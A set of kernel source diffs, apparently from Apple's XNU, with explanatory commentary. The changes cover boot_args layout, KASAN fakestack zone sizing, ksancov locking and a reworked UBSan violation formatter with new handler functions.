        uint64_t    KC_hdrs_vaddr;
 
-       uint64_t    arvRootHashStart; /* Physical address of root hash file */
+       uint64_t    arvRootHashStart; /* Physical address of system volume root hash file */
        uint64_t    arvRootHashSize;
 
-       uint64_t    arvManifestStart; /* Physical address of manifest file */
+       uint64_t    arvManifestStart; /* Physical address of system volume manifest file */
        uint64_t    arvManifestSize;
 
+       uint64_t    bsARVRootHashStart;/* Physical address of base system root hash file */
+       uint64_t    bsARVRootHashSize;
+
+       uint64_t    bsARVManifestStart;/* Physical address of base system manifest file */
+       uint64_t    bsARVManifestSize;
+
        /* Reserved */
-       uint32_t    __reserved4[700];
+       uint32_t    __reserved4[692];
 } boot_args;
 
 extern char assert_boot_args_size_is_4096[sizeof(boot_args) == 4096 ? 1 : -1];
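
The arithmetic behind the reserved-array change: the four new base-system ARV fields add 4 x 8 = 32 bytes, i.e. 8 uint32_t slots, so __reserved4 shrinks from 700 to 692 entries and sizeof(boot_args) stays at 4096, as the compile-time assert on the line above requires. The same size-pinning idiom in a standalone form:

/* Standalone illustration of the negative-array-size assert used above:
 * the build breaks if the structure ever drifts from 4096 bytes. */
#include <stdint.h>

struct example_args {
	uint64_t new_fields[4];      /* 32 bytes of new content */
	uint32_t reserved[1016];     /* 4064 bytes of padding   */
};

extern char assert_example_args_size[sizeof(struct example_args) == 4096 ? 1 : -1];
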
index 72f916f33bc415f6531182c5d6469f4a57a4c883..4f0c5a53f4496d0421c469a9ebcf207bf27f4db6 100644 (file)
@@ -139,12 +139,12 @@ ___ubsan_handle_negate_overflow
 ___ubsan_handle_negate_overflow_abort
 ___ubsan_handle_nonnull_arg
 ___ubsan_handle_nonnull_arg_abort
-___ubsan_handle_nonnull_return
-___ubsan_handle_nonnull_return_abort
+___ubsan_handle_nonnull_return_v1
+___ubsan_handle_nonnull_return_v1_abort
 ___ubsan_handle_nullability_arg
 ___ubsan_handle_nullability_arg_abort
-___ubsan_handle_nullability_return
-___ubsan_handle_nullability_return_abort
+___ubsan_handle_nullability_return_v1
+___ubsan_handle_nullability_return_v1_abort
 ___ubsan_handle_out_of_bounds
 ___ubsan_handle_out_of_bounds_abort
 ___ubsan_handle_pointer_overflow
index 00c42c7781b82d9c330c74174f5e42e58d96b673..9d7a97047666f9c3db10faae88bbb108e0c0168f 100644 (file)
@@ -46,5 +46,4 @@ fun:_ZL18IOTrackingLeakScanPv
 # Exclude KASAN dependencies
 # XXX: could this be relaxed since fakestack is reentrant?
 src:./osfmk/kern/zalloc.c
-src:./osfmk/kern/zcache.c
 
index 9f45135d63d00ada065a9a890f57d9813326ed02..b865b7ff2256c3a69c1e28fe454991c41b837b01 100644 (file)
@@ -282,11 +282,12 @@ kasan_init_fakestack(void)
 
                snprintf(fakestack_names[i], 16, "fakestack.%d", i);
                fakestack_zones[i] = zone_create_ext(fakestack_names[i], sz,
-                   ZC_NOCALLOUT | ZC_NOGC | ZC_KASAN_NOREDZONE | ZC_KASAN_NOQUARANTINE,
+                   ZC_NOCALLOUT | ZC_NOGC | ZC_NOCACHING |
+                   ZC_KASAN_NOREDZONE | ZC_KASAN_NOQUARANTINE,
                    ZONE_ID_ANY, ^(zone_t z) {
-                       zone_set_exhaustible(z, maxsz);
+                       zone_set_exhaustible(z, maxsz / sz);
                });
-               zfill(fakestack_zones[i], (int)maxsz / sz);
+               zone_fill_initially(fakestack_zones[i], maxsz / sz);
        }
 
        /* globally enable */
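
The fakestack fix above is a units correction: zone_set_exhaustible() takes an element count, so it now receives maxsz / sz rather than the raw byte budget, and the per-zone prefill moves from zfill() to zone_fill_initially() with the same count. A quick check of the arithmetic, with illustrative numbers rather than the kernel's actual budgets:

/* Illustrative numbers only (not the kernel's actual budgets). */
#include <assert.h>
#include <stddef.h>

int
main(void)
{
	size_t maxsz = 512 * 1024;   /* total backing for this fakestack size class, bytes */
	size_t sz    = 4 * 1024;     /* element size of the size class, bytes              */
	size_t limit = maxsz / sz;   /* what the zone limit must be: 128 elements          */

	assert(limit == 128);
	return 0;
}
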
index 762d69da8e004853894c7ca58ca200d53f85ae17..975a5fc2c7b30ba20889ba61eafecaa9183f8fac 100644 (file)
@@ -106,7 +106,7 @@ static uint32_t __unused npcs = 0;
 static _Atomic unsigned active_devs;
 
 static LCK_GRP_DECLARE(ksancov_lck_grp, "ksancov_lck_grp");
-static lck_rw_t *ksancov_devs_lck;
+static LCK_RW_DECLARE(ksancov_devs_lck, &ksancov_lck_grp);
 
 /* array of devices indexed by devnode minor */
 static ksancov_dev_t ksancov_devs[KSANCOV_MAX_DEV];
@@ -386,21 +386,21 @@ ksancov_open(dev_t dev, int flags, int devtype, proc_t p)
                return EBUSY;
        }
 
-       lck_rw_lock_exclusive(ksancov_devs_lck);
+       lck_rw_lock_exclusive(&ksancov_devs_lck);
 
        if (ksancov_devs[minor_num]) {
-               lck_rw_unlock_exclusive(ksancov_devs_lck);
+               lck_rw_unlock_exclusive(&ksancov_devs_lck);
                return EBUSY;
        }
 
        ksancov_dev_t d = create_dev(dev);
        if (!d) {
-               lck_rw_unlock_exclusive(ksancov_devs_lck);
+               lck_rw_unlock_exclusive(&ksancov_devs_lck);
                return ENOMEM;
        }
        ksancov_devs[minor_num] = d;
 
-       lck_rw_unlock_exclusive(ksancov_devs_lck);
+       lck_rw_unlock_exclusive(&ksancov_devs_lck);
 
        return 0;
 }
@@ -531,6 +531,9 @@ ksancov_detach(ksancov_dev_t d)
                thread_wait(d->thread, TRUE);
        }
 
+       assert(active_devs >= 1);
+       os_atomic_sub(&active_devs, 1, relaxed);
+
        /* drop our thread reference */
        thread_deallocate(d->thread);
        d->thread = THREAD_NULL;
@@ -542,10 +545,10 @@ ksancov_close(dev_t dev, int flags, int devtype, proc_t p)
 #pragma unused(flags,devtype,p)
        const int minor_num = minor(dev);
 
-       lck_rw_lock_exclusive(ksancov_devs_lck);
+       lck_rw_lock_exclusive(&ksancov_devs_lck);
        ksancov_dev_t d = ksancov_devs[minor_num];
        ksancov_devs[minor_num] = NULL; /* dev no longer discoverable */
-       lck_rw_unlock_exclusive(ksancov_devs_lck);
+       lck_rw_unlock_exclusive(&ksancov_devs_lck);
 
        /*
         * No need to lock d here as there is and will be no one having its
@@ -558,10 +561,8 @@ ksancov_close(dev_t dev, int flags, int devtype, proc_t p)
        }
 
        if (d->mode == KS_MODE_TRACE && d->trace) {
-               os_atomic_sub(&active_devs, 1, relaxed);
                os_atomic_store(&d->trace->enabled, 0, relaxed); /* stop tracing */
        } else if (d->mode == KS_MODE_COUNTERS && d->counters) {
-               os_atomic_sub(&active_devs, 1, relaxed);
                os_atomic_store(&d->counters->enabled, 0, relaxed);         /* stop tracing */
        }
 
@@ -620,10 +621,10 @@ ksancov_ioctl(dev_t dev, unsigned long cmd, caddr_t _data, int fflag, proc_t p)
        struct ksancov_buf_desc *mcmd;
        void *data = (void *)_data;
 
-       lck_rw_lock_shared(ksancov_devs_lck);
+       lck_rw_lock_shared(&ksancov_devs_lck);
        ksancov_dev_t d = ksancov_devs[minor(dev)];
        if (!d) {
-               lck_rw_unlock_shared(ksancov_devs_lck);
+               lck_rw_unlock_shared(&ksancov_devs_lck);
                return EINVAL;         /* dev not open */
        }
 
@@ -666,7 +667,7 @@ ksancov_ioctl(dev_t dev, unsigned long cmd, caddr_t _data, int fflag, proc_t p)
                break;
        }
 
-       lck_rw_unlock_shared(ksancov_devs_lck);
+       lck_rw_unlock_shared(&ksancov_devs_lck);
 
        return ret;
 }
@@ -736,7 +737,5 @@ ksancov_init_dev(void)
        ksancov_edgemap->nedges = (uint32_t)nedges;
        ksancov_edgemap->offset = KSANCOV_PC_OFFSET;
 
-       ksancov_devs_lck = lck_rw_alloc_init(&ksancov_lck_grp, LCK_ATTR_NULL);
-
        return 0;
 }
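
Throughout this hunk the ksancov device lock becomes a statically declared lck_rw_t, so the lock exists before ksancov_init_dev() runs, the former lck_rw_alloc_init() call disappears, and every call site switches from the pointer to &ksancov_devs_lck. A condensed before/after of the pattern, using only the xnu lock calls that appear in the hunks above; shown for shape, not as a buildable unit outside the kernel tree.

/* Before: pointer-valued lock, allocated during device init. */
static lck_grp_t *old_grp;          /* set up with lck_grp_alloc_init() */
static lck_rw_t  *old_lck;

static void
old_init(void)
{
	old_lck = lck_rw_alloc_init(old_grp, LCK_ATTR_NULL);
}

static void
old_lookup(void)
{
	lck_rw_lock_shared(old_lck);
	/* ... table lookup ... */
	lck_rw_unlock_shared(old_lck);
}

/* After: statically declared group and lock; no init step, callers take
 * the address of the lock object. */
static LCK_GRP_DECLARE(new_grp, "example_grp");
static LCK_RW_DECLARE(new_lck, &new_grp);

static void
new_lookup(void)
{
	lck_rw_lock_shared(&new_lck);
	/* ... table lookup ... */
	lck_rw_unlock_shared(&new_lck);
}
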
index 0c0a11ecebd55993695419dcec0b83b71e6d01c3..a40ce58a3268afeaf60bb3e05cf2f63c1d8acc36 100644 (file)
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2016 Apple Inc. All rights reserved.
+ * Copyright (c) 2016-2020 Apple Inc. All rights reserved.
  *
  * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
  *
@@ -75,7 +75,14 @@ __nosan_strlcpy(char *dst, const char *src, size_t sz)
 static inline char  *
 __nosan_strncpy(char *dst, const char *src, size_t sz)
 {
+#ifdef __clang__
+#pragma clang diagnostic push
+#pragma clang diagnostic ignored "-Wdeprecated-declarations"
+#endif
        return strncpy(dst, src, sz);
+#ifdef __clang__
+#pragma clang diagnostic pop
+#endif
 }
 static inline size_t
 __nosan_strlcat(char *dst, const char *src, size_t sz)
@@ -85,7 +92,14 @@ __nosan_strlcat(char *dst, const char *src, size_t sz)
 static inline char  *
 __nosan_strncat(char *dst, const char *src, size_t sz)
 {
+#ifdef __clang__
+#pragma clang diagnostic push
+#pragma clang diagnostic ignored "-Wdeprecated-declarations"
+#endif
        return strncat(dst, src, sz);
+#ifdef __clang__
+#pragma clang diagnostic pop
+#endif
 }
 static inline size_t
 __nosan_strnlen(const char *src, size_t sz)
index d8e42d708bc1fb741c52d924d1bf68ba9922f1a8..d245d424c51035a529418eca520aa93d24d4cd91 100644 (file)
@@ -28,6 +28,7 @@
 
 #include <stdatomic.h>
 #include <kern/debug.h>
+#include <kern/assert.h>
 #include <libkern/libkern.h>
 #include "ubsan.h"
 
@@ -35,14 +36,27 @@ static const bool ubsan_print = false;
 static const uint32_t line_acquired = 0x80000000UL;
 static const char *get_type_check_kind(uint8_t kind);
 
-static size_t
-format_loc(struct san_src_loc *loc, char *dst, size_t sz)
+static void
+ubsan_buf_log(struct ubsan_buf *ub, const char *fmt, ...)
 {
-       return scnprintf(dst, sz, ", file:\"%s\", line:%d, column:%d },\n",
-                  loc->filename,
-                  loc->line & ~line_acquired,
-                  loc->col
-                  );
+       va_list ap;
+
+       va_start(ap, fmt);
+       int n = vscnprintf(ub->ub_buf + ub->ub_logged, ub->ub_buf_size - ub->ub_logged, fmt, ap);
+       va_end(ap);
+
+       ub->ub_logged += n;
+       assert(ub->ub_logged <= ub->ub_buf_size);
+}
+
+static void
+ubsan_buf_log_loc(struct ubsan_buf *ub, const char *desc, struct san_src_loc *loc)
+{
+       ubsan_buf_log(ub, "%s:{ file:\"%s\", line:%d, column:%d }",
+           desc,
+           loc->filename,
+           loc->line & ~line_acquired,
+           loc->col);
 }
 
 /*
@@ -70,33 +84,30 @@ overflow_str[] = {
        NULL
 };
 
-static size_t
-format_overflow(struct ubsan_violation *v, char *buf, size_t sz)
+static void
+format_overflow(struct ubsan_violation *v, struct ubsan_buf *ub)
 {
        struct san_type_desc *ty = v->overflow->ty;
-       return scnprintf(buf, sz,
-                  "problem:\"%s overflow\", op:\"%s\", ty:\"%s\", width:%d, lhs:0x%llx, rhs:0x%llx, ",
-                  ty->issigned ? "signed" : "unsigned",
-                  overflow_str[v->ubsan_type],
-                  ty->name,
-                  1 << ty->width,
-                  v->lhs,
-                  v->rhs
-                  );
+       ubsan_buf_log(ub,
+           "problem:\"%s overflow\", op:\"%s\", ty:\"%s\", width:%d, lhs:0x%llx, rhs:0x%llx",
+           ty->issigned ? "signed" : "unsigned",
+           overflow_str[v->ubsan_type],
+           ty->name,
+           1 << ty->width,
+           v->lhs,
+           v->rhs
+           );
 }
 
-static size_t
-format_shift(struct ubsan_violation *v, char *buf, size_t sz)
+static void
+format_shift(struct ubsan_violation *v, struct ubsan_buf *ub)
 {
-       size_t n = 0;
        struct san_type_desc *l = v->shift->lhs_t;
        struct san_type_desc *r = v->shift->rhs_t;
 
-       n += scnprintf(buf + n, sz - n, "problem:\"bad shift\", ");
-       n += scnprintf(buf + n, sz - n, "lhs:0x%llx, lty:\"%s\", lsigned:%d, lwidth:%d, ", v->lhs, l->name, l->issigned, 1 << l->width);
-       n += scnprintf(buf + n, sz - n, "rhs:0x%llx, rty:\"%s\", rsigned:%d, rwidth:%d, ", v->rhs, r->name, r->issigned, 1 << r->width);
-
-       return n;
+       ubsan_buf_log(ub, "problem:\"bad shift\", ");
+       ubsan_buf_log(ub, "lhs:0x%llx, lty:\"%s\", lsigned:%d, lwidth:%d, ", v->lhs, l->name, l->issigned, 1 << l->width);
+       ubsan_buf_log(ub, "rhs:0x%llx, rty:\"%s\", rsigned:%d, rwidth:%d", v->rhs, r->name, r->issigned, 1 << r->width);
 }
 
 static const char * const
@@ -114,89 +125,196 @@ get_type_check_kind(uint8_t kind)
               : "some";
 }
 
-static size_t
-format_type_mismatch(struct ubsan_violation *v, char *buf, size_t sz)
+static void
+format_type_mismatch(struct ubsan_violation *v, struct ubsan_buf *ub)
 {
-       size_t n = 0;
        size_t alignment = 1 << v->align->align;
        void *ptr = (void*)v->lhs;
-       const char * kind = get_type_check_kind(v->align->kind);
+       const char *kind = get_type_check_kind(v->align->kind);
+
        if (NULL == ptr) {
                //null pointer use
-               n += scnprintf(buf + n, sz - n, "problem:\"%s NULL pointer\", ty:\"%s\", ", kind, v->align->ty->name);
+               ubsan_buf_log(ub, "problem:\"%s NULL pointer\", ty:\"%s\"", kind, v->align->ty->name);
        } else if (alignment && ((uintptr_t)ptr & (alignment - 1))) {
                //misaligned pointer use
-               n += scnprintf(buf + n, sz - n, "problem:\"%s mis-aligned\", address:%p, ty:\"%s\", ", kind, (void*)v->lhs, v->align->ty->name);
-               n += scnprintf(buf + n, sz - n, "required_alignment:%d, ", 1 << v->align->align);
+               ubsan_buf_log(ub, "problem:\"%s mis-aligned\", address:%p, ty:\"%s\", ",
+                   kind, (void*)v->lhs, v->align->ty->name);
+               ubsan_buf_log(ub, "required_alignment:%d", 1 << v->align->align);
        } else {
                //insufficient object size
-               n += scnprintf(buf + n, sz - n, "problem:\"%s insufficient object size\", ty:\"%s\", address:%p, ",
+               ubsan_buf_log(ub, "problem:\"%s insufficient object size\", ty:\"%s\", address:%p",
                    kind, v->align->ty->name, ptr);
        }
-
-       return n;
 }
 
-static size_t
-format_oob(struct ubsan_violation *v, char *buf, size_t sz)
+static void
+format_oob(struct ubsan_violation *v, struct ubsan_buf *ub)
 {
-       size_t n = 0;
        struct san_type_desc *aty = v->oob->array_ty;
        struct san_type_desc *ity = v->oob->index_ty;
        uintptr_t idx = v->lhs;
 
-       n += scnprintf(buf + n, sz - n, "problem:\"OOB array access\", ");
-       n += scnprintf(buf + n, sz - n, "idx:%ld, ", idx);
-       n += scnprintf(buf + n, sz - n, "aty:\"%s\", asigned:%d, awidth:%d, ", aty->name, aty->issigned, 1 << aty->width);
-       n += scnprintf(buf + n, sz - n, "ity:\"%s\", isigned:%d, iwidth:%d, ", ity->name, ity->issigned, 1 << ity->width);
+       ubsan_buf_log(ub, "problem:\"OOB array access\", ");
+       ubsan_buf_log(ub, "idx:%ld, ", idx);
+       ubsan_buf_log(ub, "aty:\"%s\", asigned:%d, awidth:%d, ", aty->name, aty->issigned, 1 << aty->width);
+       ubsan_buf_log(ub, "ity:\"%s\", isigned:%d, iwidth:%d", ity->name, ity->issigned, 1 << ity->width);
+}
 
-       return n;
+static void
+format_nullability_arg(struct ubsan_violation *v, struct ubsan_buf *ub)
+{
+       struct ubsan_nullability_arg_desc *data = v->nonnull_arg;
+
+       const int arg_index = data->arg_index;
+       const char *attr_type = v->lhs ? "nonnull attribute" : "_Nonnull annotation";
+
+       ubsan_buf_log(ub, "problem:\"null in argument %d declared with %s\", ", arg_index, attr_type);
+       ubsan_buf_log_loc(ub, "declared", &data->attr_loc);
 }
 
-static size_t
-format_load_invalid_value(struct ubsan_violation *v, char *buf, size_t sz)
+static void
+format_nonnull_return(struct ubsan_violation *v, struct ubsan_buf *ub)
 {
-       return scnprintf(buf, sz, "problem:\"invalid value load\", type:\"%s\", value:0x%llx",
-                  v->invalid->type->name, v->lhs);
+       struct san_src_loc *declaration = (struct san_src_loc *)v->rhs;
+       const char *return_type = v->lhs ? "returns_nonnull attribute" : "_Nonnull return type annotation";
+
+       ubsan_buf_log(ub, "problem:\"null returned from function declared with %s\", ", return_type);
+       ubsan_buf_log_loc(ub, "declared", declaration);
 }
 
-size_t
-ubsan_format(struct ubsan_violation *v, char *buf, size_t sz)
+static void
+format_load_invalid_value(struct ubsan_violation *v, struct ubsan_buf *ub)
 {
-       size_t n = scnprintf(buf, sz, "{ ");
+       ubsan_buf_log(ub, "problem:\"invalid value load\", type:\"%s\", value:0x%llx",
+           v->invalid->type->name, v->lhs);
+}
+
+static void
+format_missing_return(struct ubsan_violation *v __unused, struct ubsan_buf *ub)
+{
+       ubsan_buf_log(ub, "problem:\"no value returned from value-returning function\"");
+}
+
+static void
+format_float_cast_overflow(struct ubsan_violation *v, struct ubsan_buf *ub)
+{
+       struct ubsan_float_desc *data = v->flt;
+       /*
+        * Cannot print out offending value (e.g. using %A, %f and so on) as kernel logging
+        * does not support float types (yet).
+        */
+       ubsan_buf_log(ub, "problem:\"%s type value outside the range of %s\"",
+           data->type_from->name, data->type_to->name);
+}
+
+static const char *
+get_implicit_conv_type(unsigned char kind)
+{
+       static const char * const conv_types[] = {
+               "integer truncation",
+               "unsigned integer truncation",
+               "signed integer truncation",
+               "integer sign change",
+               "signed integer truncation or sign change"
+       };
+       static const size_t conv_types_cnt = sizeof(conv_types) / sizeof(conv_types[0]);
+
+       return kind < conv_types_cnt ? conv_types[kind] : "unknown implicit integer conversion";
+}
+
+static void
+format_implicit_conversion(struct ubsan_violation *v, struct ubsan_buf *ub)
+{
+       struct ubsan_implicit_conv_desc *data = v->implicit;
+       struct san_type_desc *from = data->type_from;
+       struct san_type_desc *to = data->type_to;
+
+       ubsan_buf_log(ub, "problem:\"%s\", ", get_implicit_conv_type(data->kind));
+       ubsan_buf_log(ub, "src value:%#llx type:\"%s\", signed:%d, width:%d, ",
+           v->lhs, from->name, from->issigned, 1 << from->width);
+       ubsan_buf_log(ub, "dst value:%#llx type:\"%s\", signed:%d, width:%d",
+           v->rhs, to->name, to->issigned, 1 << to->width);
+}
+
+static void
+format_function_type_mismatch(struct ubsan_violation *v, struct ubsan_buf *ub)
+{
+       struct ubsan_func_type_mismatch_desc *data = v->func_mismatch;
+       ubsan_buf_log(ub, "problem:\"indirect function call through %p of a wrong type %s\"",
+           (void *)v->lhs, data->type->name);
+}
+
+static void
+format_vla_bound_not_positive(struct ubsan_violation *v, struct ubsan_buf *ub)
+{
+       struct ubsan_vla_bound_desc *data = v->vla_bound;
+       ubsan_buf_log(ub, "problem:\"VLA %s bound %#llx not positive\"", data->type->name, v->lhs);
+}
+
+static void
+format_invalid_builtin(struct ubsan_violation *v, struct ubsan_buf *ub)
+{
+       ubsan_buf_log(ub, "problem:\"passing invalid zero argument to %s\"",
+           v->invalid_builtin->kind == 0 ? "ctz()" : "clz()");
+}
+
+void
+ubsan_format(struct ubsan_violation *v, struct ubsan_buf *ub)
+{
+       ubsan_buf_log(ub, "{ ");
 
        switch (v->ubsan_type) {
        case UBSAN_OVERFLOW_add ... UBSAN_OVERFLOW_negate:
-               n += format_overflow(v, buf + n, sz - n);
+               format_overflow(v, ub);
                break;
        case UBSAN_UNREACHABLE:
-               n += scnprintf(buf + n, sz - n, "problem:\"unreachable\", ");
+               ubsan_buf_log(ub, "problem:\"unreachable\", ");
                break;
        case UBSAN_SHIFT:
-               n += format_shift(v, buf + n, sz - n);
+               format_shift(v, ub);
                break;
        case UBSAN_TYPE_MISMATCH:
-               n += format_type_mismatch(v, buf + n, sz - n);
+               format_type_mismatch(v, ub);
                break;
        case UBSAN_POINTER_OVERFLOW:
-               n += scnprintf(buf + n, sz - n, "problem:\"pointer overflow\", before:0x%llx, after:0x%llx, ", v->lhs, v->rhs);
+               ubsan_buf_log(ub, "problem:\"pointer overflow\", before:0x%llx, after:0x%llx", v->lhs, v->rhs);
                break;
        case UBSAN_OOB:
-               n += format_oob(v, buf + n, sz - n);
+               format_oob(v, ub);
                break;
-       case UBSAN_LOAD_INVALID_VALUE:
-               n += format_load_invalid_value(v, buf + n, sz - n);
+       case UBSAN_NULLABILITY_ARG:
+               format_nullability_arg(v, ub);
+               break;
+       case UBSAN_NULLABILITY_RETURN:
+               format_nonnull_return(v, ub);
+               break;
+       case UBSAN_MISSING_RETURN:
+               format_missing_return(v, ub);
+               break;
+       case UBSAN_FLOAT_CAST_OVERFLOW:
+               format_float_cast_overflow(v, ub);
+               break;
+       case UBSAN_IMPLICIT_CONVERSION:
+               format_implicit_conversion(v, ub);
                break;
-       case UBSAN_GENERIC:
-               n += scnprintf(buf + n, sz - n, "problem:\"generic\", function:\"%s\", ", v->func);
+       case UBSAN_FUNCTION_TYPE_MISMATCH:
+               format_function_type_mismatch(v, ub);
+               break;
+       case UBSAN_VLA_BOUND_NOT_POSITIVE:
+               format_vla_bound_not_positive(v, ub);
+               break;
+       case UBSAN_INVALID_BUILTIN:
+               format_invalid_builtin(v, ub);
+               break;
+       case UBSAN_LOAD_INVALID_VALUE:
+               format_load_invalid_value(v, ub);
                break;
        default:
                panic("unknown violation");
        }
 
-       n += format_loc(v->loc, buf + n, sz - n);
-
-       return n;
+       ubsan_buf_log_loc(ub, ", found", v->loc);
+       ubsan_buf_log(ub, " },\n");
 }
 
 enum UBFatality { Fatal, FleshWound };
@@ -212,10 +330,13 @@ ubsan_handle(struct ubsan_violation *v, enum UBFatality fatality)
        ubsan_log_append(v);
 
        if (ubsan_print || (fatality == Fatal)) {
-               const size_t sz = 256;
-               static char buf[sz];
-               buf[0] = '\0';
-               ubsan_format(v, buf, sz);
+               static char buf[256] = { 0 };
+               struct ubsan_buf ubsan_buf = {
+                       .ub_logged = 0,
+                       .ub_buf_size = sizeof(buf),
+                       .ub_buf = buf
+               };
+               ubsan_format(v, &ubsan_buf);
                printf("UBSan: %s", buf);
        }
 }
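
The formatter rework above replaces the "return how many bytes I wrote" plumbing with a shared append cursor: ubsan_buf_log() formats into ub_buf + ub_logged with vscnprintf(), which returns the number of bytes actually written (never more than the space left), so the cursor can be advanced directly and the assert holds. A standalone userspace model of the same pattern, with vsnprintf() clamped to imitate vscnprintf():

/* Userspace model of the append-cursor pattern; vsnprintf() is clamped so
 * the cursor advances by bytes actually written, like the kernel's
 * vscnprintf(). */
#include <stdarg.h>
#include <stddef.h>
#include <stdio.h>

struct strbuf {
	size_t logged;        /* bytes written so far */
	size_t size;          /* capacity of buf      */
	char  *buf;
};

static void
strbuf_log(struct strbuf *sb, const char *fmt, ...)
{
	va_list ap;

	va_start(ap, fmt);
	int n = vsnprintf(sb->buf + sb->logged, sb->size - sb->logged, fmt, ap);
	va_end(ap);

	if (n < 0) {
		return;                                   /* formatting error: leave cursor alone */
	}
	size_t avail = sb->size - sb->logged;
	sb->logged += ((size_t)n < avail) ? (size_t)n     /* fit entirely             */
	    : (avail ? avail - 1 : 0);                    /* truncated: count written */
}

int
main(void)
{
	char storage[64];
	struct strbuf sb = { 0, sizeof(storage), storage };

	strbuf_log(&sb, "{ ");
	strbuf_log(&sb, "problem:\"%s\", value:0x%llx", "example", 0x2aULL);
	strbuf_log(&sb, " },\n");
	printf("%s", sb.buf);
	return 0;
}
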
@@ -299,6 +420,146 @@ __ubsan_handle_out_of_bounds_abort(struct ubsan_oob_desc *desc, uint64_t idx)
        ubsan_handle(&v, Fatal);
 }
 
+void
+__ubsan_handle_nullability_arg(struct ubsan_nullability_arg_desc *desc)
+{
+       struct ubsan_violation v = { UBSAN_NULLABILITY_ARG, 0, 0, .nonnull_arg = desc, &desc->loc };
+       ubsan_handle(&v, FleshWound);
+}
+
+void
+__ubsan_handle_nullability_arg_abort(struct ubsan_nullability_arg_desc *desc)
+{
+       struct ubsan_violation v = { UBSAN_NULLABILITY_ARG, 0, 0, .nonnull_arg = desc, &desc->loc };
+       ubsan_handle(&v, Fatal);
+}
+
+void
+__ubsan_handle_nonnull_arg(struct ubsan_nullability_arg_desc *desc)
+{
+       struct ubsan_violation v = { UBSAN_NULLABILITY_ARG, 1, 0, .nonnull_arg = desc, &desc->loc };
+       ubsan_handle(&v, FleshWound);
+}
+
+void
+__ubsan_handle_nonnull_arg_abort(struct ubsan_nullability_arg_desc *desc)
+{
+       struct ubsan_violation v = { UBSAN_NULLABILITY_ARG, 1, 0, .nonnull_arg = desc, &desc->loc };
+       ubsan_handle(&v, Fatal);
+}
+
+void
+__ubsan_handle_nullability_return_v1(struct ubsan_nullability_ret_desc *desc, uint64_t declaration)
+{
+       struct ubsan_violation v = { UBSAN_NULLABILITY_RETURN, 0, (uint64_t)&desc->loc, .nonnull_ret = desc, (struct san_src_loc *)declaration };
+       ubsan_handle(&v, FleshWound);
+}
+
+void
+__ubsan_handle_nullability_return_v1_abort(struct ubsan_nullability_ret_desc *desc, uint64_t declaration)
+{
+       struct ubsan_violation v = { UBSAN_NULLABILITY_RETURN, 0, (uint64_t)&desc->loc, .nonnull_ret = desc, (struct san_src_loc *)declaration };
+       ubsan_handle(&v, Fatal);
+}
+
+void
+__ubsan_handle_nonnull_return_v1(struct ubsan_nullability_ret_desc *desc, uint64_t declaration)
+{
+       struct ubsan_violation v = { UBSAN_NULLABILITY_RETURN, 1, (uint64_t)&desc->loc, .nonnull_ret = desc, (struct san_src_loc *)declaration };
+       ubsan_handle(&v, FleshWound);
+}
+
+void
+__ubsan_handle_nonnull_return_v1_abort(struct ubsan_nullability_ret_desc *desc, uint64_t declaration)
+{
+       struct ubsan_violation v = { UBSAN_NULLABILITY_RETURN, 1, (uint64_t)&desc->loc, .nonnull_ret = desc, (struct san_src_loc *)declaration };
+       ubsan_handle(&v, Fatal);
+}
+
+void
+__ubsan_handle_missing_return(struct ubsan_missing_ret_desc *desc)
+{
+       struct ubsan_violation v = { UBSAN_MISSING_RETURN, 0, 0, .missing_ret = desc, &desc->loc };
+       ubsan_handle(&v, Fatal);
+}
+
+void
+__ubsan_handle_missing_return_abort(struct ubsan_missing_ret_desc *desc)
+{
+       struct ubsan_violation v = { UBSAN_MISSING_RETURN, 0, 0, .missing_ret = desc, &desc->loc };
+       ubsan_handle(&v, Fatal);
+}
+
+void
+__ubsan_handle_float_cast_overflow(struct ubsan_float_desc *desc, uint64_t value)
+{
+       struct ubsan_violation v = { UBSAN_FLOAT_CAST_OVERFLOW, value, 0, .flt = desc, &desc->loc };
+       ubsan_handle(&v, Fatal);
+}
+
+void
+__ubsan_handle_float_cast_overflow_abort(struct ubsan_float_desc *desc, uint64_t value)
+{
+       struct ubsan_violation v = { UBSAN_FLOAT_CAST_OVERFLOW, value, 0, .flt = desc, &desc->loc };
+       ubsan_handle(&v, Fatal);
+}
+
+void
+__ubsan_handle_implicit_conversion(struct ubsan_implicit_conv_desc *desc, uint64_t from, uint64_t to)
+{
+       struct ubsan_violation v = { UBSAN_IMPLICIT_CONVERSION, from, to, .implicit = desc, &desc->loc };
+       ubsan_handle(&v, Fatal);
+}
+
+void
+__ubsan_handle_implicit_conversion_abort(struct ubsan_implicit_conv_desc *desc, uint64_t from, uint64_t to)
+{
+       struct ubsan_violation v = { UBSAN_IMPLICIT_CONVERSION, from, to, .implicit = desc, &desc->loc };
+       ubsan_handle(&v, Fatal);
+}
+
+void
+__ubsan_handle_function_type_mismatch(struct ubsan_func_type_mismatch_desc *desc, uint64_t func)
+{
+       struct ubsan_violation v = { UBSAN_FUNCTION_TYPE_MISMATCH, func, 0, .func_mismatch = desc, &desc->loc };
+       ubsan_handle(&v, Fatal);
+}
+
+void
+__ubsan_handle_function_type_mismatch_abort(struct ubsan_func_type_mismatch_desc *desc, uint64_t func)
+{
+       struct ubsan_violation v = { UBSAN_FUNCTION_TYPE_MISMATCH, func, 0, .func_mismatch = desc, &desc->loc };
+       ubsan_handle(&v, Fatal);
+}
+
+void
+__ubsan_handle_vla_bound_not_positive(struct ubsan_vla_bound_desc *desc, uint64_t length)
+{
+       struct ubsan_violation v = { UBSAN_VLA_BOUND_NOT_POSITIVE, length, 0, .vla_bound = desc, &desc->loc };
+       ubsan_handle(&v, Fatal);
+}
+
+void
+__ubsan_handle_vla_bound_not_positive_abort(struct ubsan_vla_bound_desc *desc, uint64_t length)
+{
+       struct ubsan_violation v = { UBSAN_VLA_BOUND_NOT_POSITIVE, length, 0, .vla_bound = desc, &desc->loc };
+       ubsan_handle(&v, Fatal);
+}
+
+void
+__ubsan_handle_invalid_builtin(struct ubsan_invalid_builtin *desc)
+{
+       struct ubsan_violation v = { UBSAN_INVALID_BUILTIN, 0, 0, .invalid_builtin = desc, &desc->loc };
+       ubsan_handle(&v, Fatal);
+}
+
+void
+__ubsan_handle_invalid_builtin_abort(struct ubsan_invalid_builtin *desc)
+{
+       struct ubsan_violation v = { UBSAN_INVALID_BUILTIN, 0, 0, .invalid_builtin = desc, &desc->loc };
+       ubsan_handle(&v, Fatal);
+}
+
 void
 __ubsan_handle_load_invalid_value(struct ubsan_load_invalid_desc *desc, uint64_t invalid_value)
 {
